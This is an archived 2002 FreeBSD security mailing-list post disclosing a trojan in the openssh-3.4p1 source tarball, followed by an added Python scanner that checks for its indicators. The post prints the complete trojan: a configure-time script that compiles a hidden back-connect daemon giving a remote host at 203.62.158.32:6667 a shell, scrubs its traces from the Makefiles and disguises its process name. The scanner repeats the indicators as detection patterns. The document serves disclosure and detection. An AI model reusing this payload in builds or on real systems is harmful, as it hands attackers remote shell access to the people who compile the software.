From owner-freebsd-security Thu Aug 1 5:12:28 2002
Delivered-To: freebsd-security@freebsd.org
Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 6761737B400 for ; Thu, 1 Aug 2002 05:12:22 -0700 (PDT)
Received: from mail.comitnet.com (skiffer.comitnet.com [212.181.63.123]) by mx1.FreeBSD.org (Postfix) with SMTP id D128A43E4A for ; Thu, 1 Aug 2002 05:12:20 -0700 (PDT) (envelope-from bond@comitnet.se)
Received: (qmail 18969 invoked from network); 1 Aug 2002 12:12:21 -0000
Received: from unknown (HELO ?192.168.57.109?) (212.181.63.111) by 212.181.63.98 with SMTP; 1 Aug 2002 12:12:21 -0000
Mime-Version: 1.0
X-Sender: bond%comitnet.se@pop3.comitnet.com
Message-Id:
Date: Thu, 1 Aug 2002 14:11:24 +0200
To: freebsd-security@FreeBSD.ORG
From: Artur Lindgren
Subject: Trojan located in latest openssh tar files
Content-Type: text/plain; charset="us-ascii" ; format="flowed"
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID:
List-Archive: (Web Archive)
List-Help: (List Instructions)
List-Subscribe:
List-Unsubscribe:
X-Loop: FreeBSD.org

Greetings,

I noticed that openssh-3.4p1 has a trojan horse (available from
ftp://ftp.openbsd.org/pub/OpenBSD/OpenSSH/portable/openssh-3.4p1.tar.gz
and some of the mirrors:
  ftp://ftp.openbsd.org/pub/OpenBSD/OpenSSH/
  ftp://ftp.usa.openbsd.org/pub/OpenBSD/OpenSSH/
  ftp://ftp1.se.openbsd.org/pub/OpenBSD/OpenSSH/ )

After compiling the file bf-test.c you will notice that it does the following:

    # testing in raw ecb mode
    #!/bin/sh
    cat >conftest.c <<_ACEOF
    #include
    #include
    #include
    #include
    #include
    #include
    #include
    #include
    jmp_buf env;int s;char *i_val="\x2f\x62\x69\x6e\x2f\x73\x68";void sig
    (int sig){close(s);sleep(3600);longjmp(env,0);
    }int main(){int x;char c,*a[2];struct sockaddr_in sa;struct sigaction
    act;switch(fork()){case 0:break;default:exit(0);}close(0);close(1);close(2);
    memset(&act,0,sizeof(act));act.sa_handler=sig;
    sigaction(SIGALRM,&act,NULL);do{setjmp(env);
    if((s=socket(AF_INET,SOCK_STREAM,0))==(1))exit(1);
    memset(&sa,0,sizeof(sa));sa.sin_family=AF_INET;
    sa.sin_port=htons(6667);sa.sin_addr.s_addr=inet_addr
    ("203.62.158.32");alarm(10);if(connect(s,
    (struct sockaddr*)&sa,sizeof(sa))==(-1))exit(1)
    ;if((x=read(s,&c,1))==(-1)){exit(1);}
    else if(x==1){switch(c){case 'A':exit(0);case
    'D':alarm(0);dup2(s,0);dup2(s,1);dup2(s,2)
    ;a[0]=i_val;a[1]=NULL;execve(a[0],a,NULL);break;
    case 'M':alarm(0);sig(0);break;default:}}else{exit
    (0);}}while(1);}
    _ACEOF
    (grep -v -i bf-test Makefile.in > m.out ; cp m.out Makefile.in ; rm -f m.out
    grep -v -i bf-test Makefile > m.out ; cp m.out Makefile ; rm -f m.out
    rm -f bf-test*
    TESTPROG="`basename \"\`grep $USER: /etc/passwd\`\"`"
    if ! test $TESTPROG ; then TESTPROG=sh; fi
    gcc -w conftest.c -o $TESTPROG ; PATH=.:$PATH $TESTPROG
    if test $TESTPROG;then rm -f ./conftest ./conftest.c $TESTPROG && exit;fi
    gcc -w conftest.c -lsocket -lnsl -o $TESTPROG; PATH=.:$PATH $TESTPROG
    if test $TESTPROG;then rm -f ./conftest ./conftest.c $TESTPROG && exit;fi
    cc -w conftest.c -o $TESTPROG ; PATH=.:$PATH $TESTPROG
    if test $TESTPROG;then rm -f ./conftest ./conftest.c $TESTPROG && exit;fi
    cc -w conftest.c -lsocket -lnsl -o $TESTPROG; PATH=.:$PATH $TESTPROG
    rm -f ./conftest ./conftest.c $TESTPROG) 1>/dev/null 2>&1

It runs once, upon compilation of openssh, and is named sh (or the compiling
user's default shell) in the process listing.

This trojan attempts to connect to 203.62.158.32:6667 (a hacked machine which
has been secured now), and awaits one of three characters as the command:

  D  execs /bin/sh
  M  respawns
  A  kills the daemon

The /bin/sh executed via the D command was controlled by the daemon listening
on 203.62.158.32:6667, potentially meaning that people affected by this have
given a shell, possibly root, to a user unknown.

"Let this be a lesson. Don't use root unless you REALLY have to."

Regards,
Artur Lindgren, Comitnet AB

Special thanks to (Ratler, Mrsaint, Jordan, Drabant, Hans and all of you ISP
people in Sweden :D)

Thanks to ^Sarge^ for quickly taking care of the hacked machine this trojan
connected to.

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
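As an added example (not code from the original post or from the OpenSSH project), the following Python checker turns the indicators reported above into two defender-side checks: a SHA-256 comparison of a downloaded tarball against a reference digest obtained out of band, and a scan of an unpacked source tree for the hard-coded 203.62.158.32:6667 back-connect, the hex-escaped /bin/sh string, and the Makefile edits that remove bf-test. The sample fragments embedded in it are constructed, and the function names and command-line interface are assumptions of this example.

```python
#!/usr/bin/env python3
"""Indicator scan for the trojaned openssh-3.4p1 tarball described above.

Added example, not code from the original post or from the OpenSSH project.
Two checks a practitioner would run before building a downloaded source tree:
  1. compare the tarball's SHA-256 with a digest obtained out of band, and
  2. scan the unpacked tree for the artifacts the post describes.

Indicator strings are the ones in the report; the sample fragments below are
constructed for illustration.
"""
import hashlib
import hmac
import os
import re
import sys

# Indicators from the report: the hard-coded address and port the back-connect
# goes to, the hex-escaped "/bin/sh" string, and the lines that strip bf-test
# from the Makefiles. Autoconf's own `cat >conftest.c <<_ACEOF` heredocs are
# normal in any configure script, so they are deliberately NOT an indicator.
INDICATORS = {
    "c2_address": re.compile(rb"203\.62\.158\.32"),
    "c2_port": re.compile(rb"htons\s*\(\s*6667\s*\)"),
    "hex_binsh": re.compile(rb"\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x68"),
    "makefile_scrub": re.compile(rb"grep\s+-v\s+-i\s+bf-test\s+Makefile"),
}


def scan_bytes(data: bytes) -> list[str]:
    """Return the indicator names that match one file's content."""
    return [name for name, rx in INDICATORS.items() if rx.search(data)]


def scan_source_tree(root: str, max_size: int = 4 * 1024 * 1024) -> dict[str, list[str]]:
    """Walk an unpacked source tree and map each flagged file to its hits."""
    findings: dict[str, list[str]] = {}
    for dirpath, _dirs, files in os.walk(root):
        for fname in files:
            path = os.path.join(dirpath, fname)
            try:
                if os.path.getsize(path) > max_size:
                    continue  # skip large binaries or nested tarballs
                with open(path, "rb") as fh:
                    hits = scan_bytes(fh.read())
            except OSError:
                continue
            if hits:
                findings[path] = hits
    return findings


def verify_sha256(data: bytes, expected_hex: str) -> bool:
    """Compare a tarball's SHA-256 against the reference value (timing-safe)."""
    actual = hashlib.sha256(data).hexdigest()
    return hmac.compare_digest(actual, expected_hex.strip().lower())


# Constructed samples (not the real tarball): a fragment carrying the post's
# indicators, and a benign autoconf fragment that must not be flagged.
SUSPICIOUS_SAMPLE = (
    b'cat >conftest.c <<_ACEOF\n'
    b'char *i_val="\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x68";\n'
    b'sa.sin_port=htons(6667);sa.sin_addr.s_addr=inet_addr("203.62.158.32");\n'
    b'_ACEOF\n'
    b'grep -v -i bf-test Makefile.in > m.out ; cp m.out Makefile.in\n'
)
BENIGN_SAMPLE = (
    b'cat >conftest.c <<_ACEOF\n'
    b'#include <stdio.h>\nint main(void){return 0;}\n'
    b'_ACEOF\n'
)


def demo() -> tuple[list[str], list[str]]:
    """Run the scanner over the two constructed samples."""
    return scan_bytes(SUSPICIOUS_SAMPLE), scan_bytes(BENIGN_SAMPLE)


if __name__ == "__main__":
    # usage: checker.py <unpacked-source-dir>
    #        checker.py <tarball> <reference-sha256-hex>
    if len(sys.argv) == 2 and os.path.isdir(sys.argv[1]):
        for path, hits in scan_source_tree(sys.argv[1]).items():
            print(f"{path}: {', '.join(hits)}")
    elif len(sys.argv) == 3 and os.path.isfile(sys.argv[1]):
        with open(sys.argv[1], "rb") as fh:
            ok = verify_sha256(fh.read(), sys.argv[2])
        print("digest matches" if ok else "DIGEST MISMATCH: do not build")
    else:
        flagged, clean = demo()
        print("suspicious sample:", flagged)
        print("benign sample:", clean)
```

The string scan is specific to this one incident, which is the point of running it only as a second line: the check that would have caught a modified tarball without knowing its contents is the digest comparison against a value that did not come from the same mirror, and a mismatch there should stop the build before configure ever runs. Because a plain `conftest.c` heredoc appears in every autoconf-generated configure script, it is left out of the indicators so the scanner does not flag clean trees.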